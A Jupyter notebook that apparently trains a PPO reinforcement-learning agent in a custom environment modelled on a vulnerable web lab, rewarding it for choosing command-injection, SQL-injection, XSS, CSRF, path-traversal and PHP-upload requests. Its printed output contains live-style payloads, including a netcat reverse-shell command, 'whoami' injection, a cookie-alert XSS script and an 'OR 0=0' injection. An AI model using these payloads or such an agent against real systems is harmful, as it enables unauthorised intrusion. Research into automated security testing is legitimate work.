## 1. Import Dependencies

In [2]:
#import gym stuff
import gym 
from gym import Env
from gym.spaces import Discrete, Box, Dict, Tuple, MultiBinary, MultiDiscrete 
from stable_baselines3.common.vec_env import DummyVecEnv
from stable_baselines3.common.callbacks import EvalCallback, StopTrainingOnRewardThreshold

#import helpers
import numpy as np
import random
import os
import pandas as pd

#import stable_baseline stuff
from stable_baselines3 import DQN, PPO
from stable_baselines3.common.vec_env import VecFrameStack
from stable_baselines3.common.evaluation import evaluate_policy

## 2. Creat Env

In [3]:
class CustomEnv(Env):
    def __init__(self, data_path = "Data_test\data_demo.csv"):
        
        self.action_space = Discrete(141)
        self.observation_space = Discrete(242, start=100)
        #self.observation_space = Box(low=100, high=161, shape=(1,), dtype=int)
        
        data = pd.read_csv("Data_test\data_demo.csv")
        #self.data_request = data.request
        #self.data_response = data.response
        #self.data_lable = data.lable
        self.data_request_list = data.request.to_list()
        self.data_general_request_list = data.general_request.to_list()
        self.data_general_unique_list = data.general_unique.tolist()
        self.data_response_list = data.response_simple.to_list()
        self.data_lable_list = data.lable.to_list()
        self.data_value_list = data._value_.to_list()
        self.data_key_request_list = data.key_request.to_list()
                 
        #Lấy index các dạng tổng quát
        self.lable_exploit_list = [self.data_value_list[index] for index, label in enumerate(self.data_lable_list) if label == 'exploit']
        self.lable_upload_list = [self.data_value_list[index] for index, label in enumerate(self.data_lable_list) if label == 'upload']
        self.lable_end_list = [self.data_value_list[index] for index, label in enumerate(self.data_lable_list) if label == 'end']             

        self.general_upload = [index for index, general in enumerate(self.data_general_unique_list) if general == 'MixString-MixStringMixString-MixStringname=PureStringfilename=PureString.php']
        self.general_end = [index for index, general in enumerate(self.data_general_unique_list) if general == 'MixString']

        self.general_cmdinj_1_collect = [index for index, general in enumerate(self.data_general_unique_list) if general =="ip=Number.Number.Number.Number%HexString%HexStringMixString&Submit=PureString"]
        self.general_cmdinj_2_collect = [index for index, general in enumerate(self.data_general_unique_list) if general =="ip=Number.Number.Number.Number%HexString%HexStringMixString-MixString&Submit=PureString"]
        self.general_cmdinj_3_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="ip=Number.Number.Number.Number%HexString%HexStringMixString-MixString%HexStringMixString%HexStringMixStringNumber.Number.Number.NumberNumber&Submit=PureString"]
        self.general_cmdinj_4_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="ip=Number.Number.Number.Number%HexString%HexStringMixString-MixString%HexString%HexString%HexStringMixString%HexStringMixString%HexStringNumber.Number.Number.Number%HexStringNumberNumber%HexString%HexStringNumber&Submit=PureString"]
        
        self.general_sql_1_collect = [index for index, general in enumerate(self.data_general_unique_list) if general =="?id=%HexStringNumber&Submit=PureString"]
        self.general_sql_2_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="?id=%HexString%HexStringNumberMixString%HexStringNumber%HexString%HexString%HexStringNumber&Submit=PureString"]
        self.general_sql_3_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="?id=%HexStringNumber%HexStringMixStringMixStringMixString%HexStringMixStringMixStringMixString%HexString&Submit=PureString"]
        self.general_sql_4_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="id=NumberMixStringNumber%HexStringNumber%HexString&Submit=PureString"]
        self.general_sql_5_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="id=%HexStringNumber%HexStringMixStringMixStringMixString%HexStringMixStringMixStringMixString%HexString&Submit=PureString"]
        self.general_sql_6_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="?id=Number%HexStringMixStringMixString%HexStringNumber%HexString%HexString&Submit=PureString"]
        self.general_sql_7_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="id=NumberMixStringMixString%HexStringNumber%HexString%HexString&Submit=PureString"]
        
        
        self.general_xss_1_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="?default=PureString%HexStringMixString%HexStringMixString(%HexStringMixString%HexStringMixString%HexStringMixString%HexStringNumber)%HexString/PathString%HexString"]
        self.general_xss_2_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="?default=PureString%HexString/PathString%HexString%HexString/PathString%HexString%HexStringMixString%HexStringsrc=%HexStringMixString%HexString%HexStringonerror=%HexStringMixString(%HexStringNumberMixString.MixString%HexString)%HexString%HexString"]
        self.general_xss_3_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="?name=%HexStringMixString%HexStringMixString%HexStringNumberMixString.MixString%HexString%HexString%HexString%HexStringMixString%HexString"]
        self.general_xss_4_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="?name=%HexStringMixStringMixString%HexStringMixStringMixString%HexStringMixString%HexStringNumberMixString.MixString%HexString%HexString"]
        self.general_xss_5_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="txtName=PureString&mtxMessage=%HexStringMixString%HexStringMixString%HexStringNumberMixString.MixString%HexString%HexString%HexString%HexStringMixString%HexString&btnSign=PureStringMixString"]
        self.general_xss_6_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="txtName=%HexStringMixString%HexStringMixString%HexStringNumberMixString.MixString%HexString%HexString%HexString%HexStringMixString%HexString&mtxMessage=PureString&btnSign=PureStringMixString"]
        self.general_xss_7_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="txtName=%HexStringMixStringMixString%HexStringMixStringMixString%HexStringMixString%HexStringNumberMixString.MixString%HexString%HexString&mtxMessage=PureString&btnSign=PureStringMixString"]
        
        self.general_csrf_1_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="?password_new=NumberPureString&password_conf=PureString&Change=PureString"]
        
        self.general_path_raversal_1_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="?page=/PathString/PathString/PathString/PathString/PathString/PathString/PathString/PathString"]
        self.general_path_raversal_2_exploit = [index for index, general in enumerate(self.data_general_unique_list) if general =="?page=PureString.php%HexString/PathString/PathString/PathString/PathString/PathString/PathString/PathString/PathString"]                       
        
        
        # Initialize state
        self.lable_collect_list = [self.data_value_list[index] for index, label in enumerate(self.data_lable_list) if label == 'collect']
        self.state = np.random.choice(self.lable_collect_list)
        
        # Set shower length
        self.shower_length = 10
        
    def step(self, action):
        self.total_reward = 0
        self.shower_length -= 1 
        # Calculate reward
        if self.state in self.lable_collect_list:
            if action in self.general_cmdinj_1_collect and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 0
            elif action in self.general_cmdinj_2_collect and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 0
            elif action in self.general_sql_1_collect and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 0
            else:
                reward = -1
                
        elif self.state in self.lable_exploit_list:
            if action in self.general_cmdinj_3_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_cmdinj_4_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_sql_2_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_sql_3_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_sql_4_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_sql_5_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_sql_6_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_sql_7_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            
            elif action in self.general_xss_1_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_xss_2_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_xss_3_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_xss_4_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_xss_5_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_xss_6_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_xss_7_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
                
            elif action in self.general_csrf_1_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
                
            elif action in self.general_path_raversal_1_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            elif action in self.general_path_raversal_2_exploit and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 1
            else:
                reward = -1
            
            
        elif self.state in self.lable_upload_list:
            if action in self.general_upload and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
                reward = 5
            else:
                reward = -1
        elif self.state in self.lable_end_list and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
            if self.total_reward > 0:
                reward = 0
            else:
                reward = -1
        elif self.state in self.lable_end_list and self.data_key_request_list[action] == self.data_key_request_list[self.data_value_list.index(self.state)]:
            if self.total_reward <= 0:
                reward = -1
        else:
            reward = -1        
            
       
            
        self.total_reward += reward
            
       
        # Check if shower is done
        if self.shower_length <= 0: 
            done = True
        else:
            done = False
        
        if done:
            self.state = np.random.choice(self.lable_collect_list)
        else:
            self.state = np.random.choice(self.data_value_list)
        
        # Set placeholder for info
        info = {}
        
        # Return step information
        return self.state, reward, done, info

    
    def reset(self):
        # Reset shower temperature
        self.state = np.random.choice(self.lable_collect_list)
        # Reset shower time
        self.shower_length = 10
        return self.state

In [4]:
env = CustomEnv()

In [5]:
env.state

134

## 3. Test Environment

In [6]:
# Test the environment

episodes = 5
for episode in range(1, episodes + 1):
    state = env.reset()
    print(f"Current State {state}: {env.data_request_list[env.data_value_list.index(state)]}")
    done = False
    total_reward = 0

    print(f"================== Episode {episode} ===================")

    while not done:
        #print(f"Next State: {env.cmd_list[next_state]}")
        #print(f"Current State: {state}")
        

        # Take a random action
        action = env.action_space.sample()
        print(f"Selected Action {action}:\n{env.data_response_list[action]}")
        #print(f"Selected Action: {action}")

        # Step forward in the environment
        next_state, reward, done, _ = env.step(action)
        
        print(f"\nLength: {env.shower_length}")
        print(f"Reward: {reward} \n")
        total_reward += reward
        
        print(f"Next State {next_state}: {env.data_request_list[env.data_value_list.index(next_state)]}")

    print(f"Total Reward for Episode {episode}: {total_reward}\n\n")


Current State 139: ip=127.0.0.1+%26%26+whoami&Submit=Submit
================== Episode 1 ===================
Selected Action 99:
XSS

Length: 9
Reward: -1 

Next State 193: ?default=French%3Cscript%3Ealert(document.cookie)%3C/script%3E 
Selected Action 44:
Linux 92f9ebbdb3cf 6.1.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.12-1kali2 (2023-02-23) x86_64 GNU/Linux
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=127 time=50.810 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=127 time=45.426 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=127 time=39.944 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=127 time=38.391 ms
--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max/stddev = 38.391/43.643/50.810/4.894 ms

Length: 8
Reward: -1 

Next State 168: id=0+OR+0%3D0%23&Submit=Submit
Selected Action 4:
PING 8.8.8.8 (8.8.8.8): 56 data bytes
64 bytes from 8.8.8.8: icmp_seq=0 ttl=127 time=49.068 ms
64 bytes from 8

## 4. Vectorise Environment and Train Model

In [7]:
log_path = os.path.join('Training', 'Logs')

In [8]:
log_path

'Training\\Logs'

In [9]:
env = DummyVecEnv([lambda: env])
model = PPO('MlpPolicy', env, verbose = 1, tensorboard_log = log_path)

C:\Users\Asus\anaconda3\Lib\site-packages\stable_baselines3\common\vec_env\patch_gym.py:49: UserWarning: You provided an OpenAI Gym environment. We strongly recommend transitioning to Gymnasium environments. Stable-Baselines3 is automatically wrapping your environments in a compatibility layer, which could potentially cause issues.
  warnings.warn(
C:\Users\Asus\anaconda3\Lib\site-packages\torch\cuda\__init__.py:138: UserWarning: CUDA initialization: The NVIDIA driver on your system is too old (found version 11060). Please update your GPU driver by downloading and installing a new version from the URL: http://www.nvidia.com/Download/index.aspx Alternatively, go to: https://pytorch.org to install a PyTorch version that has been compiled with your version of the CUDA driver. (Triggered internally at ..\c10\cuda\CUDAFunctions.cpp:108.)
  return torch._C._cuda_getDeviceCount() > 0


Using cpu device


In [10]:
save_path = os.path.join('Training', 'Saved Models')

In [56]:
eval_callback = EvalCallback(env,
                            #callback_on_new_best=stop_callback,
                            eval_freq=100000,
                            best_model_save_path=save_path,
                            verbose= 1,
                            )

In [57]:
model.learn(total_timesteps=500000, callback=eval_callback)

Logging to Training\Logs\PPO_21
-----------------------------
| time/              |      |
|    fps             | 1103 |
|    iterations      | 1    |
|    time_elapsed    | 1    |
|    total_timesteps | 2048 |
-----------------------------
-----------------------------------------
| time/                   |             |
|    fps                  | 744         |
|    iterations           | 2           |
|    time_elapsed         | 5           |
|    total_timesteps      | 4096        |
| train/                  |             |
|    approx_kl            | 0.005047215 |
|    clip_fraction        | 0.004       |
|    clip_range           | 0.2         |
|    entropy_loss         | -4.95       |
|    explained_variance   | -0.00243    |
|    learning_rate        | 0.0003      |
|    loss                 | 2.21        |
|    n_updates            | 10          |
|    policy_gradient_loss | -0.0238     |
|    value_loss           | 10.5        |
-----------------------------------------
--

-----------------------------------------
| time/                   |             |
|    fps                  | 554         |
|    iterations           | 13          |
|    time_elapsed         | 48          |
|    total_timesteps      | 26624       |
| train/                  |             |
|    approx_kl            | 0.011273128 |
|    clip_fraction        | 0.107       |
|    clip_range           | 0.2         |
|    entropy_loss         | -4.86       |
|    explained_variance   | 0.0215      |
|    learning_rate        | 0.0003      |
|    loss                 | 3.25        |
|    n_updates            | 120         |
|    policy_gradient_loss | -0.057      |
|    value_loss           | 7.01        |
-----------------------------------------
-----------------------------------------
| time/                   |             |
|    fps                  | 554         |
|    iterations           | 14          |
|    time_elapsed         | 51          |
|    total_timesteps      | 28672 

-----------------------------------------
| time/                   |             |
|    fps                  | 530         |
|    iterations           | 24          |
|    time_elapsed         | 92          |
|    total_timesteps      | 49152       |
| train/                  |             |
|    approx_kl            | 0.014896173 |
|    clip_fraction        | 0.154       |
|    clip_range           | 0.2         |
|    entropy_loss         | -4.76       |
|    explained_variance   | 0.0198      |
|    learning_rate        | 0.0003      |
|    loss                 | 3.1         |
|    n_updates            | 230         |
|    policy_gradient_loss | -0.0697     |
|    value_loss           | 6.91        |
-----------------------------------------
-----------------------------------------
| time/                   |             |
|    fps                  | 528         |
|    iterations           | 25          |
|    time_elapsed         | 96          |
|    total_timesteps      | 51200 

-----------------------------------------
| time/                   |             |
|    fps                  | 528         |
|    iterations           | 35          |
|    time_elapsed         | 135         |
|    total_timesteps      | 71680       |
| train/                  |             |
|    approx_kl            | 0.016756874 |
|    clip_fraction        | 0.183       |
|    clip_range           | 0.2         |
|    entropy_loss         | -4.57       |
|    explained_variance   | 0.0313      |
|    learning_rate        | 0.0003      |
|    loss                 | 3.45        |
|    n_updates            | 340         |
|    policy_gradient_loss | -0.0756     |
|    value_loss           | 7.09        |
-----------------------------------------
-----------------------------------------
| time/                   |             |
|    fps                  | 529         |
|    iterations           | 36          |
|    time_elapsed         | 139         |
|    total_timesteps      | 73728 

-----------------------------------------
| time/                   |             |
|    fps                  | 523         |
|    iterations           | 46          |
|    time_elapsed         | 179         |
|    total_timesteps      | 94208       |
| train/                  |             |
|    approx_kl            | 0.016528279 |
|    clip_fraction        | 0.18        |
|    clip_range           | 0.2         |
|    entropy_loss         | -4.26       |
|    explained_variance   | 0.0668      |
|    learning_rate        | 0.0003      |
|    loss                 | 3.85        |
|    n_updates            | 450         |
|    policy_gradient_loss | -0.0684     |
|    value_loss           | 8.13        |
-----------------------------------------
-----------------------------------------
| time/                   |             |
|    fps                  | 522         |
|    iterations           | 47          |
|    time_elapsed         | 184         |
|    total_timesteps      | 96256 

...

-----------------------------------------
| time/                   |             |
|    fps                  | 506         |
|    iterations           | 193         |
|    time_elapsed         | 779         |
|    total_timesteps      | 395264      |
| train/                  |             |
|    approx_kl            | 0.011179148 |
|    clip_fraction        | 0.123       |
|    clip_range           | 0.2         |
|    entropy_loss         | -0.818      |
|    explained_variance   | 0.188       |
|    learning_rate        | 0.0003      |
|    loss                 | 2.03        |
|    n_updates            | 1920        |
|    policy_gradient_loss | -0.0213     |
|    value_loss           | 4.24        |
-----------------------------------------
-----------------------------------------
| time/                   |             |
|    fps                  | 506         |
|    iterations           | 194         |
|    time_elapsed         | 784         |
|    total_timesteps      | 397312

-----------------------------------------
| time/                   |             |
|    fps                  | 507         |
|    iterations           | 204         |
|    time_elapsed         | 823         |
|    total_timesteps      | 417792      |
| train/                  |             |
|    approx_kl            | 0.011846289 |
|    clip_fraction        | 0.131       |
|    clip_range           | 0.2         |
|    entropy_loss         | -0.838      |
|    explained_variance   | 0.185       |
|    learning_rate        | 0.0003      |
|    loss                 | 2.14        |
|    n_updates            | 2030        |
|    policy_gradient_loss | -0.0219     |
|    value_loss           | 4.55        |
-----------------------------------------
----------------------------------------
| time/                   |            |
|    fps                  | 507        |
|    iterations           | 205        |
|    time_elapsed         | 827        |
|    total_timesteps      | 419840     

-----------------------------------------
| time/                   |             |
|    fps                  | 507         |
|    iterations           | 215         |
|    time_elapsed         | 866         |
|    total_timesteps      | 440320      |
| train/                  |             |
|    approx_kl            | 0.010980664 |
|    clip_fraction        | 0.136       |
|    clip_range           | 0.2         |
|    entropy_loss         | -0.769      |
|    explained_variance   | 0.188       |
|    learning_rate        | 0.0003      |
|    loss                 | 1.11        |
|    n_updates            | 2140        |
|    policy_gradient_loss | -0.0229     |
|    value_loss           | 4.54        |
-----------------------------------------
-----------------------------------------
| time/                   |             |
|    fps                  | 507         |
|    iterations           | 216         |
|    time_elapsed         | 870         |
|    total_timesteps      | 442368

-----------------------------------------
| time/                   |             |
|    fps                  | 508         |
|    iterations           | 226         |
|    time_elapsed         | 910         |
|    total_timesteps      | 462848      |
| train/                  |             |
|    approx_kl            | 0.010045157 |
|    clip_fraction        | 0.11        |
|    clip_range           | 0.2         |
|    entropy_loss         | -0.706      |
|    explained_variance   | 0.191       |
|    learning_rate        | 0.0003      |
|    loss                 | 1.11        |
|    n_updates            | 2250        |
|    policy_gradient_loss | -0.0179     |
|    value_loss           | 4.49        |
-----------------------------------------
-----------------------------------------
| time/                   |             |
|    fps                  | 508         |
|    iterations           | 227         |
|    time_elapsed         | 914         |
|    total_timesteps      | 464896

-----------------------------------------
| time/                   |             |
|    fps                  | 508         |
|    iterations           | 237         |
|    time_elapsed         | 954         |
|    total_timesteps      | 485376      |
| train/                  |             |
|    approx_kl            | 0.013627166 |
|    clip_fraction        | 0.132       |
|    clip_range           | 0.2         |
|    entropy_loss         | -0.658      |
|    explained_variance   | 0.179       |
|    learning_rate        | 0.0003      |
|    loss                 | 1.17        |
|    n_updates            | 2360        |
|    policy_gradient_loss | -0.021      |
|    value_loss           | 4.21        |
-----------------------------------------
-----------------------------------------
| time/                   |             |
|    fps                  | 508         |
|    iterations           | 238         |
|    time_elapsed         | 958         |
|    total_timesteps      | 487424

## 5. Save and Reload Model

In [58]:
PPO_path = os.path.join('Training', 'Saved Models', '_PPO_Testenv10_model_50k_esp')

In [60]:
model.save(PPO_path)

## Xem log tensorbord

In [14]:
#chạy đường dẫn 
training_log_path = os.path.join(log_path, 'PPO_21')
#-> chạy cmd cd Test\Training\Logs\PPO_21 --> chạy lệnh tensorboard --logdir=. 


## 6. Evaluate and Test

In [32]:
evaluate_policy(model, env, n_eval_episodes=10)

(3.6, 2.764054992217051)

In [56]:
data = pd.read_csv("Data_test/data_demo.csv")
data_request_list = data.request.to_list()
data_response_list = data.response_simple.to_list()
data_lable_list = data.lable.to_list()
data_value_list = data._value_.to_list()

episodes = 10
for episode in range(1, episodes+1):
    obs = env.reset()
    print(f"Current State {obs}: {data_request_list[int(data_value_list.index(obs))]}")
    done = False
    total_reward = 0 
    
    print(f"========= Episode {episode} =========")
    
    while not done:
        #print(f"Current State: {obs}")
        action, _ = model.predict(obs)
        print(f"Selected Action {action}: \n{data_response_list[int(action)]}")
        
        obs, reward, done, info = env.step(action)
        
        print(f"Reward: {reward}")
        
        total_reward += reward
        print(f"\nNext State {obs}: {data_request_list[int(data_value_list.index(obs))]}")
        #break
    print(f"Total Reward for Episode {episode}: {total_reward}\n\n")

Current State [100]: ip=8.8.8.8%3B+pwd&Submit=Submit
========= Episode 1 =========
Selected Action [1]: 
PING 8.8.8.8 (8.8.8.8): 56 data bytes
64 bytes from 8.8.8.8: icmp_seq=0 ttl=127 time=56.715 ms
64 bytes from 8.8.8.8: icmp_seq=1 ttl=127 time=38.985 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=127 time=37.313 ms
64 bytes from 8.8.8.8: icmp_seq=3 ttl=127 time=37.060 ms
--- 8.8.8.8 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max/stddev = 37.060/42.518/56.715/8.230 ms
/var/www/html/vulnerabilities/exec
Reward: [0.]

Next State [137]: ip=127.0.0.1%3B+ls&Submit=Submit
Selected Action [84]: 
User ID is MISSING from the database.
Reward: [-1.]

Next State [152]: ip=127.0.0.1+%26%26+nc+-e+%2Fbin%2Fsh+127.0.0.1+8080&Submit=Submit
Selected Action [54]: 
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=127 time=40.488 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=127 time=38.966 ms
64 bytes from 127.0.0.1: icmp_seq